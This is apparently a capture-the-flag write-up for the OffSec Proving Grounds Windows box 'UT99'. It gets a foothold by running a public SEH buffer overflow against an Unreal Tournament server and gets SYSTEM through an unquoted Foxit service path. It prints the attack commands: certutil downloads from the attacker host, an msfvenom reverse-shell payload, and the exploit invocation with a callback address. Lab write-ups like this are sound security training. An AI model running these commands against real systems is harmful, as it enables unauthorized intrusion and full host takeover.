ターゲット // UT99
PlatformOffSec Proving Grounds
OSWindows
DifficultyMedium
IP192.168.206.44

Enumeration#

Nmap#

A full port sweep is deliberately noisy here — the box parks an InspIRCd instance on dozens of ports across the 6660-7007 range, enough to make autorecon choke. Trimmed to the services that actually matter:

▶ Nmap output
PORT      STATE SERVICE   VERSION
21/tcp    open  ftp       FileZilla ftpd
80/tcp    open  http      Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
443/tcp   open  ssl/http  Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
3306/tcp  open  mysql     MySQL (unauthorized)
6660-7007 open  irc       InspIRCd
64738/tcp open  murmur    Murmur 1.2.10

FTP wants credentials, MySQL refuses external connections, and the web app on 80/443 is a stock CMS with nothing exploitable after directory fuzzing. Everything obvious is a dead end. The name of the box — UT99 — plus the wall of IRC ports is the actual hint: this is about Unreal Tournament, and the IRC server is where the map lives.

IRC — reading the channel topic#

Point HexChat at the target, connect to the IRC server, and /LIST the channels (wildcard *). One channel stands out: #ut99. Its topic is the whole game:

HexChat connected to #ut99 — topic advertises “Unreal Tournament 99 Game Server UP! Port: 7778”

Fragging since UT99! Unreal Tournament 99 Game Server UP! IP: *THIS* Port: 7778

The IRC chatter hands us the one port the scan never flagged as interesting: a live Unreal Tournament game server on 7778. That’s the way in.


Foothold#

Unreal Tournament — Remote SEH Buffer Overflow#

searchsploit unreal tournament turns up a classic: Unreal Tournament - Remote Buffer Overflow (SEH) (EDB 16145, a Perl PoC). It targets the game server’s query handler and overwrites the SEH chain to redirect execution.

Fire a listener, then point the exploit at the game port (7778) with our callback host/port:

1
perl 16145.pl 192.168.206.44 7778 192.168.49.206 8009

The overflow lands and we catch a shell as daisy — an unprivileged local user. Welcome to OffSec.


Privilege Escalation#

This is the half the box actually cares about. systeminfo confirms an ancient Windows Vista Business (6.0.6002 SP2) host, FLUFFY-PC. Nothing in the low-hanging fruit, so upload WinPEAS via certutil and read it carefully:

1
certutil.exe -urlcache -split -f http://192.168.49.206:8000/wp.exe c:\Users\daisy\Downloads\wp.exe

Unquoted Service Path — FoxitCloudUpdateService#

WinPEAS flags an unquoted service path. FoxitCloudUpdateService runs from a path full of spaces, with no quotes:

WinPEAS flagging FoxitCloudUpdateService with an unquoted binary path

C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe

Because the path isn’t quoted, Windows tries each space-delimited candidate in turn: C:\Program.exe, then C:\Program Files.exe, then C:\Program Files (x86)\Foxit.exe, then C:\Program Files (x86)\Foxit Software\Foxit.exe… The exploit only works if we can write one of those earlier candidates. Check the ACL on the service directory with icacls:

icacls showing fluffy-pc\daisy holds (W) write on the Foxit Software directory

fluffy-pc\daisy holds (W) on C:\Program Files (x86)\Foxit Software — the first candidate in that search order daisy can actually write to (the earlier ones sit in protected roots). Plant a payload there.

Build a reverse shell, drop it into the hijack path, and set a fresh listener:

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.206 LPORT=8010 -f exe > Foxit.exe
1
certutil.exe -urlcache -split -f http://192.168.49.206:8000/Foxit.exe "C:\Program Files (x86)\Foxit Software\Foxit.exe"

The service runs as SYSTEM, so we just need it to restart. net stop / net start fails — daisy can’t control the service — so force it the blunt way:

1
shutdown.exe -r -f -t 1

On reboot the service starts, resolves the unquoted path to our planted Foxit.exe, and calls back as SYSTEM.


Proof#

Shell as nt authority\system on FLUFFY-PC, both flags in hand:

User flag — dir C:\ and local.txt from daisy’s desktop

Root proof — hostname fluffy-pc, whoami nt authority\system, and proof.txt


Key Takeaways#

[ ノート ]
  • When a scan buries the surface under noise (hundreds of IRC ports), stop scanning and start reading — the box name and a channel topic pointed straight at the real service (the UT game server on 7778).
  • Don’t let unfamiliar services scare you off. searchsploit a niche game server the same way you would a web app — an old SEH overflow was the whole foothold.
  • Unquoted service paths are only exploitable if you can write to an earlier path candidate. Always pair the WinPEAS finding with an icacls check on the directory before planting a binary.
  • A SYSTEM service you can’t restart is still yours — if net stop/start is denied, a forced reboot fires the hijacked binary on boot.